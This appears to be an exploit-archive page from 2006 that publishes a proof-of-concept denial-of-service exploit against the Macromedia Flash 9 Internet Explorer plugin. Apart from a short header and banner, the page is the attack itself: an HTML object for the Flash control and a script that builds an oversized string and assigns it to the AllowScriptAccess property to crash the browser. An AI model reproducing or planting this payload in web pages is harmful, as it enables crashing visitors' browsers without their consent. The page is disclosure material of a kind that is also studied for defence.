[Exploit]  [Remote]  [Local]  [Web Apps]  [Dos/Poc]  [Shellcode]  [RSS]

# Title : Macromedia Flash 9 (IE Plugin) Remote Denial of Service Crash Exploit
# Published : 2006-08-18
# Author : Mr.Niega
# Previous Title : MS Internet Explorer <= 6.0.2900 SP2 (CSS Attribute) Denial of Service
# Next Title : MS Windows PNG File IHDR Block Denial of Service Exploit PoC (c) (2)


/*
*
* Macromedia flash crash
* Bug discovered by Mr.Niega
* http://www.swerat.com/
*
* Affected Software: Flash 9 (Ie Plugin)
* Impact: Crash
* Solution Status: Unpatched
*
* E-Mail: MarjinZ@gmail.com
* Credits goes out to MarjinZ
*
*                                        
*    /|    //| |              /|    //| |
*   //|   // | |      __     //|   // | |
*  // |  //  | |   //   ) ) // |  //  | |
* //  | //   | |  //   / / //  | //   | |
*//   |//    | | //   / / //   |//    | |
*
*
*/

<object classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" id="allo">
</object>
<script>
var A = 'A';
while (A.length <= 51512*512) A+=A;
allo.AllowScriptAccess = A;
</script>

# www.Syue.com [2006-08-18]